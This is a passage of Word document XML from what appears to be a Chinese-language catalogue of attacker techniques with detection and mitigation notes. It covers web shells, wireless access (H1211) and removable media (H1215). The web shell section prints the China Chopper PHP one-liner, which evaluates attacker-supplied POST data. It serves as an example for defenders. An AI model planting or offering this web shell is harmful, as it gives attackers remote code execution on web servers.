      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分可能很小，看起来无害。例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>China Chopper Web shell PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的小负载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DACA08F" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>&lt;?php @eval($_POST['password']);&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62989B69" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="00671A0D" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不管怎样，检测机制还是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>存在的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>进程监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测执行可疑操作（如运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或访问不在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中的文件）的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器。可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>文件监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器内容更新不匹配且可能表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>已有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>植入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件更改。还可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>服务器的日志认证尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>以及由</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>服务器或内部网络发起或接收的异常流量模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501ABA4B" w14:textId="6A90FA11" w:rsidR="00E27914" w:rsidRDefault="003A640F" w:rsidP="004F176D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A640F" w14:paraId="7096340C" w14:textId="77777777" w:rsidTr="003A640F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C192E37" w14:textId="763BDDAD" w:rsidR="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>1211</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39EC7F43" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0EDDA1" w14:textId="77777777" w:rsidR="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E5947AC" w14:textId="77777777" w:rsidR="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B554072" w14:textId="521F77B0" w:rsidR="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24FCDE98" w14:textId="77777777" w:rsidR="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F"/>
    <w:p w14:paraId="13F4220C" w14:textId="17CADC03" w:rsidR="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无线访问网络通信或连接到网络的设备，例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wifi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，蓝牙或空投来访问目标网络</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6714AA" w14:textId="799092B9" w:rsidR="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A640F" w:rsidRPr="005C4554" w14:paraId="10706E76" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="08FC7CA8" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="005C4554" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5946E949" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="005C4554" w:rsidRDefault="003A640F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A640F" w:rsidRPr="003A640F" w14:paraId="709F85F6" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="444A6FA5" w14:textId="42EDFA90" w:rsidR="003A640F" w:rsidRPr="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003A640F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于白名单的输入过滤器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A9F16B" w14:textId="580341F3" w:rsidR="003A640F" w:rsidRPr="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003A640F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序可以阻止用户访问不属于白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A640F" w:rsidRPr="003A640F" w14:paraId="071E8640" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32E32461" w14:textId="513BB530" w:rsidR="003A640F" w:rsidRPr="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003A640F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于策略过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EF77A60" w14:textId="51F997AC" w:rsidR="003A640F" w:rsidRPr="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003A640F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序可以设置策略以拒绝通过无线访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F847EAD" w14:textId="77777777" w:rsidR="003A640F" w:rsidRPr="003A640F" w:rsidRDefault="003A640F" w:rsidP="003A640F">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218E4AA7" w14:textId="46C94703" w:rsidR="008B7FC1" w:rsidRDefault="008B7FC1" w:rsidP="004F176D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>媒体访问</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B7FC1" w14:paraId="585B971C" w14:textId="77777777" w:rsidTr="008B7FC1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C75A8D7" w14:textId="420405E7" w:rsidR="008B7FC1" w:rsidRDefault="008B7FC1" w:rsidP="008B7FC1">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>1215</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40DB1232" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28DB38F7" w14:textId="77777777" w:rsidR="008B7FC1" w:rsidRDefault="008B7FC1" w:rsidP="008B7FC1">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D25350B" w14:textId="77777777" w:rsidR="008B7FC1" w:rsidRDefault="008B7FC1" w:rsidP="008B7FC1">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAD7483" w14:textId="60D80353" w:rsidR="008B7FC1" w:rsidRDefault="008B7FC1" w:rsidP="008B7FC1">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程访问日志、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志、认证日志、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="757CFE77" w14:textId="77777777" w:rsidR="008B7FC1" w:rsidRPr="008B7FC1" w:rsidRDefault="008B7FC1" w:rsidP="008B7FC1">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666AE0FB" w14:textId="0FE24108" w:rsidR="008B7FC1" w:rsidRDefault="008B7FC1" w:rsidP="008B7FC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过可移动媒体部署恶意代码。可移动媒体可以编程为在插入设备时自动运行，从而导致恶意软件自动执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A046D21" w14:textId="76DB6CFE" w:rsidR="008B7FC1" w:rsidRDefault="008B7FC1" w:rsidP="008B7FC1">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B7FC1" w:rsidRPr="005C4554" w14:paraId="094B634F" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="25F5C5B1" w14:textId="77777777" w:rsidR="008B7FC1" w:rsidRPr="005C4554" w:rsidRDefault="008B7FC1" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="60ADDEDB" w14:textId="77777777" w:rsidR="008B7FC1" w:rsidRPr="005C4554" w:rsidRDefault="008B7FC1" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B7FC1" w:rsidRPr="003A640F" w14:paraId="4F8E630E" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C2D88D2" w14:textId="77777777" w:rsidR="008B7FC1" w:rsidRPr="003A640F" w:rsidRDefault="008B7FC1" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003A640F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于白名单的输入过滤器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69E69FD3" w14:textId="77777777" w:rsidR="008B7FC1" w:rsidRPr="003A640F" w:rsidRDefault="008B7FC1" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003A640F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序可以阻止用户访问不属于白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B7FC1" w:rsidRPr="003A640F" w14:paraId="40AE401F" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="247ADE2A" w14:textId="77777777" w:rsidR="008B7FC1" w:rsidRPr="003A640F" w:rsidRDefault="008B7FC1" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003A640F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于策略过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18A9AF14" w14:textId="025157E3" w:rsidR="008B7FC1" w:rsidRPr="003A640F" w:rsidRDefault="008B7FC1" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序可以设置策略以拒绝通过可移动媒体访问</w:t>
            </w:r>
            <w:r w:rsidRPr="003A640F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7200DB9B" w14:textId="77777777" w:rsidR="008B7FC1" w:rsidRPr="008B7FC1" w:rsidRDefault="008B7FC1" w:rsidP="008B7FC1">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F3645A" w14:textId="385BD2DA" w:rsidR="00D927B2" w:rsidRDefault="00D927B2" w:rsidP="004F176D">
      <w:pPr>
        <w:pStyle w:val="2"/>
